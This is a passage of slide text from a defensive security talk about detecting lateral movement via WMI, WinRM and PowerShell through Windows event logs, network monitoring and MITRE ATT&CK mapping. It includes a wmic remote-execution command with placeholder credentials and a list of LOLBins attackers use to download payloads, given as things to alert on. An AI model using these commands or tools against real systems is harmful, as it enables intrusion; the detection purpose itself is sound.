• https://www.irongeek.com/i.php?page=videos/derbycon8/track-3-03-detecting-wmi-
exploitation-michael-gough
wmic /user:"FOREIGN_DOMAINAdmin" /password:"Password" /node:192.168.1.2 group list brief
33. More Lateral Movement
33
Public Consumption
• Windows Remote Management (WinRM)
– PowerShell Remoting
• So VERY Powerful
• Just enable and go anywhere
• This is a bit different as we need to collect a different log
• Applications and Services Logs
– Microsoft-Windows-Windows-Remote-Management/Operational
34. More Lateral Movement
34
Public Consumption
• You do need to configure the endpoint
• Bad Actors use WMI to remotely execute:
• winrm qc
• Now PowerShell is being heavily used
• Little on the Process Command Line as far as PowerShell details
• What about WinRM Logs?
• What about PowerShell Logs?
35. WinRM Has Logs
35
Public Consumption
• Event ID 6 (Host/attacker) and 91 (Target) will give you a
list of systems that are connected to
36. PowerShell Has Logs
36 Public Consumption
• Event ID 4104 will show you the PowerShell command(s) used to
connect
• Enter-PSSession <hostname> …
• Event ID 4103 will show you details against the Target system(s)
38. Network Fails
3 Public Consumption
• Outbound traffic from servers
• Most have the infamous ANY/ANY outbound
• No basic detection or alerts for odd ports or NEW IPs
• TOR uses 80 and 443, but also others
• 4443, 9001, 9030, 9040, 9050, 9051, and 9150
• What about Countries or Network Owners of the outbound IPs?
• No baseline of normal traffic
40. Capabilities Assessment
40
Public Consumption
• In the SANS PICERL model the last item is ‘Lesson Learned’
• So apply Post-Mortem to Pre-Mortem
• We call this a Capability Assessment
• What is my Incident Response capability to detect an attack and
respond quickly?
• Am I collecting the right things?
• Do I have an idea how long the data is collecting for?
• Where is the data located?
41. Capability Assessment
41 Public Consumption
• You have to understand what data you have, how long it is collecting
for and WHERE the data resides
• You will need to break glass with an IR firm before this data rolls!
• You need a process to evaluate this data and length you have it for
• You may also need a process to collect or protect the data from rolling
out of the logs
42. Capability Assessment
42
Public Consumption
• By doing a Capability Assessment you can determine if the log data
you have is adequate for Incident Response and also Threat Hunting
• You can use a well-known framework to map what you have, or
should have to detect well known items used by the bad actors
• You can track the progress of what you are collecting and create
playbooks or runbooks as you verify your sources
43. MITRE ATT&CK
43
Public Consumption
• First - Everything you do should be mapped to MITRE ATT&CK -
https://attack.mitre.org/
• Some of the techniques used
• T1021.006 – Remote Service WinRM
• T1047 – WMI
• T1059.001 - Command and Scripting Interpreter: PowerShell
• T1218 - Signed Binary Proxy Execution
• Etc.
44. Watch for Downloading LOLBin/LOLBas
44 Public Consumption
• Malicious code has to be downloaded
• Advanced attackers and Red Teams will use the LOLBin and Scripts
LOLBaS to download the payload
• Alert on these
• Baseline the normal, there will NOT be many
• Watch these executions closely
• Process Command Line details are key!!!
45. LOLBin/LOLBas That Can Be Downloaded
45
Public Consumption
• powershell.exe
• bitsadmin.exe
• certutil.exe
• psexec.exe
• wmic.exe
• mshta.exe
• mofcomp.exe
• cmstp.exe
• windbg.exe
• cdb.exe
• msbuild.exe
• csc.exe
• regsvr32.exe
• Excel too !!!
Short list per Cisco Talos
• mshta.exe
• certutil.exe
• bitsadmin.exe
• regsvr32.exe
• powershell.exe
https://blog.talosintelligence.com/2019/11/hunting-for-lolbins.html
Process Command Line is KEY
Map to MITRE ATT&CK
46. Watch Your Traffic
46
Public Consumption
• It is time to setup some basic network monitoring as a part of Security
101
• Alert on ALL non 80/443 ports from internal servers
• Of course 53, 22, 25, 465, 587, 1433, 3306 will be normal ports too,
every org will have other ports
• Look at the Network owner of the IPs and exclude the CIDR of
known/trusted owners
• Servers should not be overly complicated for outbound traffic IF they
are not on the Internet
47. Watch Your Traffic
47
Public Consumption
• Of course Internet facing servers are a bit different
• Create a procedure to lookup the Country and Network Owner and
build a normal pattern if you can for outbound traffic
• Create a way to validate IPs
• We will during an event
• We will process LOTS of IPs
• Of course you need to enable source IP logging
• AWS Flow Logs - PLEASE
48. Internet Facing Systems
48 Public Consumption
• How many Internet facing devices had remote vulnerabilities that got
pwned in the last year or two?
• It IS time to make sure the logging on Internet facing systems are
collecting locally at a minimum
• Know how long the data will exist or roll off
• Focus on having the following data in the logs
• Source IP (WHERE)
• Country origin option (log mgmt. usually has this)
• Authentication information (WHO)
50. Conclusion
50
Public Consumption
• Learn from these typical failures
• Configure your logging
• Cover ALL your assets
• Verify the Completeness
• Watch for the items in this talk
• And several other of my talks
Practice Security 101 and 201 even if you are all the way to 501 or
beyond
51. Resources
51
Public Consumption
• Websites
• Log-MD.com The tools
• ARTHIR.com Free on GitHub
• The “Windows Logging Cheat Sheet(s)”
• https://MalwareArchaeology.com/cheat-sheets
• MITRE ATT&CK is your friend
• https://attack.mitre.org/techniques/enterprise/
• JPCert Detecting Lateral Movement
• https://www.jpcert.or.jp/english/pub/sr/20170612ac-
ir_research_en.pdf
• This presentation and others on SlideShare
• Search for MalwareArchaeology or LOG-MD